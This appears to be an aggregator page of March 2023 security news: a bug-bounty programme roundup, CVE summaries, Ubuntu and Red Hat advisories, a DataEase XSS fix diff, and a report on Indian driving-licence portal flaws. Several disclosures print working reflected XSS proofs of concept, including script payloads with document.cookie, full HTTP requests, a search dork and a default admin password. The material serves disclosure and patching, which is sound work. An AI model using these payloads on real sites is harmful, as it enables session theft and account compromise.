Active IQ Unified Manager for VMware vSphere, Linux, and Microsoft Windows versions prior to 9.11P1 are susceptible to a vulnerability which allows administrative users to perform a Stored Cross-Site Scripting (XSS) attack.

CVE-2022-23239

New web targets for the discerning hacker

New web targets for the discerning hacker

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month.

The framework means that well-intentioned security researchers are free from legal jeopardy when they come to report computer security vulnerabilities in any system located in the European country – providing they follow a strict set of conditions and rules of conduct.

The guidelines, announced by the Centre for Cyber Security Belgium, apply to both private and public sector organizations. Belgium is further ahead on the curve, but it’s hoped that the scheme will inspire other countries to follow suit and companies to roll out vulnerability disclosure programs of their own.

In less congenial bug bounty-related news, independent researcher Peter Geissler publicly released the details of a set of vulnerabilities affecting Lexmark printers rather than accepting what he considered a derisory reward. The security bugs – which could be chained together to create a remote code execution attack – have since been fixed.

Another example of researchers baulking at bug bounty conditions came in the disclosure of a web security flaw in a marketing widget from analysts Gartner.

Security researcher Justin Steven wanted to write-up the technical details of a DOM-based cross-site scripting vulnerability in the Gartner Peer Insights widget, but the analyst firm warned the researcher that that it violated the rules of the private bug bounty program.

Steven publicly disclosed technical details of the vulnerability anyway, even though this meant he went without payment for the find.

There was drama aplenty when a new host of popular hacking tool XSS Hunter disclosed telemetry (anonymized statistics about the vulnerabilities unearthed) from security researchers using its version of the utility. Truffle Security faced a privacy backlash from security researchers upset that it was seemingly “peering over their shoulder” and going through their findings.

In response to the criticism, Truffle Security began offering end-to-end encryption as an option to security researchers using its version of XSS Hunter.

**The latest bug bounty programs for March 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**ATG (Enhanced)**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**ATG has raised rewards for medium, high, and critical bugs, and broadened its scope to encompass .atg.se and its subdomains. ATG is a Swedish gaming company that specializes in horse racing.

Check out the ATG bug bounty page for more details

**Bybit**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$20,000

**Outline:  
**The cryptocurrency exchange is paying out between $5,000 and $20,000 for the highest tier of criticality. The sole target in scope is bybit.com.

Check out the Bybit bug bounty page for more details

**Grindr**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The location-based social networking and dating application for the LGBTQ community cites RCE, arbitrary SQL queries on production databases, and significant authentication bypass flaws as potentially critical bugs.

Check out the Grindr bug bounty page for more details

**Linktree**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$7,500

**Outline:  
**Australian social media tool Linktree, which has 30 million users globally, has put “most” of its assets within the scope of the bug bounty program.

Check out the Linktree bug bounty page for more details

**Malwarebytes**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The anti-malware firm is offering payouts of between $50 and $2,000 for confirmed vulnerabilities. Those posing an RCE risk to Malwarebytes’ web properties or customers running its endpoint protection software, or leading to the takeover of AWS cloud infrastructure, will attract the greatest rewards.

Check out the Malwarebytes bug bounty page for more details

**Miro**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**The collaborative whiteboarding platform is offering rewards of up to $3,000. Out of scope assets include Jira Cards by Miro, Miro for Confluence, and Miro for Jira Cloud.

Check out the Miro bug bounty page for more details

**Ninja Kiwi Games**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**$3,750

**Outline:  
**The New Zealand-based video game developer has launched a second bug bounty program after a successful 2021 forerunner. Ninja Kiwi Games has created the Bloons, Bloons TD, and SAS: Zombie Assault franchises.

Check out the Ninja Kiwi Games bug bounty page for more details

**QNAP**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**QNAP, the Taiwanese manufacturer of network-attached storage appliances, has invited hackers to probe its operating systems, applications, and cloud services for vulnerabilities.

Check out the QNAP bug bounty page for more details

**Skinport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**Skinport, a marketplace for digital in-game items, has launched a program with rewards for critical flaws that open the door to trading or purchase manipulations. Vulnerabilities that result in unauthorized access to project servers or the disclosure of confidential data are also within scope.

Check out the Skinport bug bounty page for more details

**Spin by OXXO**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**In scope are an API plus iOS and Android mobile applications of Spin, a fintech app and payment card from Mexican convenience store chain Oxxo.

Check out the Spin by OXXO bug bounty page for more details

**Xdefi Technologies**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Xdefi, a cross-chain wallet extension for cryptocurrencies and NFTs, has included in the in-scope assets Xdefi Extension (Chromium web extension) and app, with rewards based on severity as per the CVSS (the Common Vulnerability Scoring Standard).

Check out the Xdefi bug bounty page for more details

**Zabbix**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**Zabbix, a vendor which provides open source infrastructure monitoring technologies, is offering up to $1,000 for high severity bugs and $3,000 for critical flaws.

Check out the Zabbix bug bounty page for more information

**Other bug bounty and VDP news this month**

*   Google has expanded its OSS Fuzz code testing service by upgrading its reward program and increasing the number of computing languages covered by the project
*   The search engine giant has also paid out its largest-ever bug bounty – worth a potentially life-changing £500,000 ($605,000) – for an Android\-related vulnerability. Google is staying tight-lipped about the details of the flaw but ITPro has narrowed down the list of possibilities
*   Intel reports that it paid out $935,000 in bug bounties last year. The chip giant’s Intel Product Security Report (pdf) said that it triaged 243 vulnerabilities in 2022, 90 of which were discovered by security researchers and reported through its bug bounty programs. The vendor “engaged 151 researchers last year, more than double compared to the previous three years”, Security Week reports.
*   An in-depth article on the YesWeHack blog by security researchers BitK and SakiiR offers a technical perspective on detecting and exploiting prototype pollution vulnerabilities in JavaScript. The research builds on earlier work by Portswigger’s Gareth Heyes on detecting server-side prototype pollution-type security flaws.
*   Security researcher Mike Takahashi has put together a Twitter thread on the so-hot topic of how AI-powered chatbots such as ChatGPT might be able to assist bug bounty hunters. The social media “brainstorm” by Takahashi is the second part in what might become an ongoing series.

Additional reporting by Adam Bannister

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for February 2023

Bug Bounty Radar // The latest bug bounty programs for March 2023

An issue was discovered in Online Reviewer Management System v1.0. There is a XSS vulnerability via reviewer_0/admins/assessments/course/course-update.php.

Permalink

**Online Reviewer Management System v1.0 by janobe has Cross-site scripting (reflected)**

BUG\_Author: crazychen123

Accessing admin accounts: Username: admin / Password: admin

Vulnerability File: reviewer\_0/admins/assessments/course/course-update.php

Parameter "courseID" (GET), exists XSS vulnerability

Payload1:courseID=1"><script>alert(1111)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(1111)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close
    

Payload2:courseID=1"><script>alert(document.cookie)</script>

#POC：

    GET /reviewer_0/admins/assessments/course/course-update.php?courseID=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: PHPSESSID=8004tqeh90ds1l3vr4t60bq179
    Connection: close

CVE-2023-25431: bug_report/XSS-1.md at main · hundanchen69/bug_report

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

Osprey Pump Controller version 1.0.1 suffers from a cross site scripting vulnerability.

    Osprey Pump Controller 1.0.1 Unauthenticated Reflected XSSVendor: ProPump and Controls, Inc.Product web page: https://www.propumpservice.com | https://www.pumpstationparts.comAffected version: Software Build ID 20211018, Production 10/18/2021                  Mirage App: MirageAppManager, Release [1.0.1]                  Mirage Model 1, RetroBoard IISummary: Providing pumping systems and automated controls forgolf courses and turf irrigation, municipal water and sewer,biogas, agricultural, and industrial markets. Osprey: door-mounted,irrigation and landscape pump controller.Technology hasn't changed dramatically on pump and electric motorsin the last 30 years. Pump station controls are a different story.More than ever before, customers expect the smooth and efficientoperation of VFD control. Communications—monitoring, remote control,and interfacing with irrigation computer programs—have become commonrequirements. Fast and reliable accessibility through cell phoneshas been a game changer.ProPump & Controls can handle any of your retrofit needs, from upgradingan older relay logic system to a powerful modern PLC controller, toconverting your fixed speed or first generation VFD control system tothe latest control platform with communications capabilities.We use a variety of solutions, from MCI-Flowtronex and Watertronicspackage panels to sophisticated SCADA systems capable of controllingand monitoring networks of hundreds of pump stations, valves, tanks,deep wells, or remote flow meters.User friendly system navigation allows quick and easy access to allcritical pump station information with no password protection unlessrequested by the customer. Easy to understand control terminology allowsany qualified pump technician the ability to make basic changes withoutsupport. Similar control and navigation platform compared to one of themost recognized golf pump station control systems for the last twentyyears make it familiar to established golf service groups nationwide.Reliable push button navigation and LCD information screen allows theuse of all existing control panel door switches to eliminate the commonproblems associated with touchscreens.Global system configuration possibilities allow it to be adapted tovirtually any PLC or relay logic controlled pump stations being used inthe industrial, municipal, agricultural and golf markets that operatevariable or fixed speed. On board Wi-Fi and available cellular modemoption allows complete remote access.Desc: Input passed to the GET parameter 'userName' is not properly sanitisedbefore being returned to the user. This can be exploited to execute arbitraryHTML/JS code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Raspbian)           Raspbian GNU/Linux 9 (stretch)           GNU/Linux 4.14.79-v7+ (armv7l)           Python 2.7.13 [GCC 6.3.0 20170516]           GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git           PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5751Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5751.php05.01.2023--http://TARGET/index.php?userName=%22%3E%3Cscript%3Econfirm(251)%3C/script%3E

Osprey Pump Controller 1.0.1 Cross Site Scripting

Ubuntu Security Notice 5899-1 - It was discovered that AWStats did not properly sanitize the content of whois responses in the hostinfo plugin. An attacker could possibly use this issue to conduct cross-site scripting attacks.

==========================================================================  
Ubuntu Security Notice USN-5899-1  
February 28, 2023

awstats vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

AWStats could allow cross-site scripting (XSS) attacks.

Software Description:  
- awstats: powerful and featureful web server log analyzer

Details:

It was discovered that AWStats did not properly sanitize the content of  
whois responses in the hostinfo plugin. An attacker could possibly use  
this issue to conduct cross-site scripting (XSS) attacks.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   awstats                         7.8-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   awstats                         7.8-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   awstats                         7.6+dfsg-2ubuntu0.20.04.2

Ubuntu 18.04 LTS:  
   awstats                         7.6+dfsg-2ubuntu0.18.04.2

Ubuntu 16.04 ESM:  
   awstats                         7.4+dfsg-1ubuntu0.4+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5899-1  
   CVE-2022-46391

Package Information:  
https://launchpad.net/ubuntu/+source/awstats/7.8-2ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/awstats/7.8-2ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/awstats/7.6+dfsg-2ubuntu0.20.04.2  
https://launchpad.net/ubuntu/+source/awstats/7.6+dfsg-2ubuntu0.18.04.2

Ubuntu Security Notice USN-5899-1

Red Hat Security Advisory 2023-0970-01 - The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Issues addressed include HTTP response splitting and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: httpd security and bug fix update  
Advisory ID:       RHSA-2023:0970-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0970  
Issue date:        2023-02-28  
CVE Names:         CVE-2006-20001 CVE-2022-36760 CVE-2022-37436   
=====================================================================

1. Summary:

An update for httpd is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The httpd packages provide the Apache HTTP Server, a powerful, efficient,  
and extensible web server.

Security Fix(es):

* httpd: mod_dav: out-of-bounds read/write of zero byte (CVE-2006-20001)

* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-36760)

* httpd: mod_proxy: HTTP response splitting (CVE-2022-37436)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* httpd-init fails to create localhost.crt, localhost.key due to "sscg"  
default now creates a /dhparams.pem and is not idempotent if the file  
/dhparams.pem already exists. (BZ#2165975)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, the httpd daemon will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2161773 - CVE-2022-37436 httpd: mod_proxy: HTTP response splitting  
2161774 - CVE-2006-20001 httpd: mod_dav: out-of-bounds read/write of zero byte  
2161777 - CVE-2022-36760 httpd: mod_proxy_ajp: Possible request smuggling

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
httpd-2.4.53-7.el9_1.1.src.rpm

aarch64:  
httpd-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-devel-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-2.4.53-7.el9_1.1.aarch64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-2.4.53-7.el9_1.1.aarch64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.aarch64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-2.4.53-7.el9_1.1.aarch64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-2.4.53-7.el9_1.1.aarch64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.aarch64.rpm

noarch:  
httpd-filesystem-2.4.53-7.el9_1.1.noarch.rpm  
httpd-manual-2.4.53-7.el9_1.1.noarch.rpm

ppc64le:  
httpd-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-devel-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-2.4.53-7.el9_1.1.ppc64le.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-2.4.53-7.el9_1.1.ppc64le.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.ppc64le.rpm

s390x:  
httpd-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-2.4.53-7.el9_1.1.s390x.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.s390x.rpm  
httpd-devel-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-2.4.53-7.el9_1.1.s390x.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-2.4.53-7.el9_1.1.s390x.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-2.4.53-7.el9_1.1.s390x.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.s390x.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-2.4.53-7.el9_1.1.s390x.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-2.4.53-7.el9_1.1.s390x.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.s390x.rpm

x86_64:  
httpd-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-core-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-debugsource-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-devel-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-2.4.53-7.el9_1.1.x86_64.rpm  
httpd-tools-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ldap-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-2.4.53-7.el9_1.1.x86_64.rpm  
mod_lua-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-2.4.53-7.el9_1.1.x86_64.rpm  
mod_proxy_html-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-2.4.53-7.el9_1.1.x86_64.rpm  
mod_session-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-2.4.53-7.el9_1.1.x86_64.rpm  
mod_ssl-debuginfo-2.4.53-7.el9_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2006-20001  
https://access.redhat.com/security/cve/CVE-2022-36760  
https://access.redhat.com/security/cve/CVE-2022-37436  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zuNzjgjWX9erEAQj8Rw/+Lo4L2fajs5cjfJGlBZU9i7mBNfFCJCks  
BSZ63H60gFLhncObvfY3N2wlNjyKL5lWA2w6hgTjnvhUQgYTkEVay7tgtLt359oy  
6c2J8ZKvjhBNeVqLhgnI5/gzzXsqVPwRLlRWlHZwrp1o5Edx0GDpcQUZTvCG46Uy  
oXpacnO9DnWuCMjiTCkM+MUFYrpZxVq4ezjOp1pB5ySlX4c2k3wYP3Usw0H88ZK+  
tVS/Cupd9JItOLriPlRJWQzuddtlzFe8KbETUOPcrOBwdgDupmUhYRPuBDwUuIKP  
4dgJ2t33fJGrPzCAArJkHnwgPchYrAEqvfbjwgLD4sBMr2mu40axgTKP6XYJ5ZsU  
Y6v/bszTLGnqJ5AoPs06PZoetU7Qt9hDN8FFJJK5ou1yTXMCpoyYj9QaQ4qkKfKC  
P/ooesrX2BSo/mrnx0XL0SoSPiKuHGKE8T0dhdw12N5mFrR/IWNxi5/u7o0jrIUt  
6qCz4jNS4xgMbdAMVvxO+CUbmO260S57kEvm+YHXxSSNZYGbDQpvx9EnCLvuraDK  
CHyUPjWHh1/a3xisc+KCn2CJf9gBMwCd7MpcU0enScrAUUE/VYtSejnfjP6NF1js  
gK0pSZN/G+YMRtBjajTCwPIAA6nAZt3zBJSfpxxJP26qT9oOpz/SxXcPFz2IbE28  
ZB4pvXtUnng=  
=WleW  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0970-01

DataEase is an open source data visualization and analysis tool. When saving a dashboard on the DataEase platform saved data can be modified and store malicious code. This vulnerability can lead to the execution of malicious code stored by the attacker on the server side when the user accesses the dashboard. The vulnerability has been fixed in version 1.18.3.

@@ -18,7 +18,7 @@ @mousedown\="handleMousedown" @blur\="handleBlur" @input\="handleInput" v-html\="element.propValue" v-html\="$xss(element.propValue)" /> <div v-if\="!canEdit" @@ -28,7 +28,7 @@ @mousedown\="handleMousedown" @blur\="handleBlur" @input\="handleInput" v-html\="element.propValue" v-html\="$xss(element.propValue)" /> </div\> <div @@ -37,7 +37,7 @@ \> <div :style\="{ verticalAlign: element.style.verticalAlign }" v-html\="textInfo" v-html\="$xss(textInfo)" /> </div\> </template\> @@ -80,7 +80,7 @@ export default { }, textInfo() { if (this.element && this.element.hyperlinks && this.element.hyperlinks.enable) { return "<a title='" + this.element.hyperlinks.content + "' target='" + this.element.hyperlinks.openMode + "' href='" + this.element.hyperlinks.content + "'>" + this.element.propValue + '</a>' return '<a title=\\'' + this.element.hyperlinks.content + '\\' target=\\'' + this.element.hyperlinks.openMode + '\\' href=\\'' + this.element.hyperlinks.content + '\\'\>' + this.element.propValue + '</a>' } else { return this.element.propValue }

CVE-2023-25807: Merge pull request #4596 from dataease/pr@dev@refactor_xss-attack · dataease/dataease@cc94fb8

Armed with personal data fragments, a researcher could also access 185 million citizens’ PII

Charlie Osborne 28 February 2023 at 14:15 UTC  
Updated: 28 February 2023 at 14:51 UTC

Armed with personal data fragments, a researcher could also access 185 million citizens’ PII

A researcher has disclosed how he was able to access the personal identifiable information (PII) of potentially 185 million Indian citizens – and create counterfeit driving licenses to boot.

On February 20, student and cybersecurity researcher Robin Justin published a blog post containing the details of vulnerabilities impacting Sarathi Parivahan, the website for India’s Ministry of Road Transport and Highways.

The portal allows citizens to apply for a learner’s permit or driving license. Justin was attempting to apply for the latter when, within minutes, he stumbled upon endpoints with broken access controls and missing authorization checks.

**‘Hiding in plain sight’**

To authenticate, you only needed an application number and the applicant’s date of birth. However, an endpoint intended to check the application state was flawed, so an attacker could supply a random application number to learn the associated applicant’s date of birth, name, address, and driving license number – as well as pull up a photo of the individual.

Since brute-forcing random application numbers would be time-consuming, Justin explored the portal further and found a second vulnerable endpoint, which only required a phone number and a victim’s date of birth to access the application number.

YOU MIGHT ALSO LIKE Password manager security: Which is the right option for me?

A few minutes later, the researcher found a public domain feature that was meant to be restricted to administrators. The feature allowed Justin to access documents uploaded by an applicant – described by the researcher as a “critically vulnerable endpoint hiding quite literally in plain sight for all to use”.

He continued: “To attain maximum impact here, we ought to chain this vulnerable endpoint with the one we found earlier, which gave us the application number of an Indian user with just their phone number and date of birth. This ultimately gives us the ability to access sensitive personal documents of any Indian we know the phone number and date of birth of.”

**OTProblem**

This wasn’t the end of the story. After reporting the above vulnerabilities to India’s Computer Emergency Response Team (CERT-IN) and receiving no response, Justin found a poorly-secured one-time password (OTP) system for a SYSADMIN account.

He managed to log into the portal with this administrator account, granting him powers including applicant searches and document viewing. The researcher also had the option to process applications without in-person verification checks, approve requests to change license information, and access the PII of government staff working at regional transport offices.

“In a nutshell, I had direct access to critical documents like Aadhaar Cards and \[the\] passports of all 185 million+ Indians that hold a driver’s license,” the researcher noted. “I could’ve also generated as many valid government-approved driver’s licenses as I wanted.”

Read more of the latest government-related cybersecurity news

At this stage, Justin reported the additional vulnerability to CERT-IN. The researcher sent the initial report on November 7, 2022 and the second on December 5. Both reports have been marked as resolved, with fixes confirmed on January 25, 2023.

Speaking to The Daily Swig, Justin said that the research process was simple and that he hasn’t faced any adverse legal ramifications over his work.

He also said that no credit was offered by CERT-IN beyond an automated “Thank you for reporting this incident to CERT-IN” reply to the report upon initial triage. Feedback received was “limited to them letting me know how the reported vulnerability was fixed”.

The Daily Swig has reached out to CERT-IN and Sarathi Parivahan with additional queries but we have, as yet, received no reply from either. We will update the story if and when we hear back.

DON’T MISS Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses

The GN Publisher plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘tab’ parameter in versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

Tag

